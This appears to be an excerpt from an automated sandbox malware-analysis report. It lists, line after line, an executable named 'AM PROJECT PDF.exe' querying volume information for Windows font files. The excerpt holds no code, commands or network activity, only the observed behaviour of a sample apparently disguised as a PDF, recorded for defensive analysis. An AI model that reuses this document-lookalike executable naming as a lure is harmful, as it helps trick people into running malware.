Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
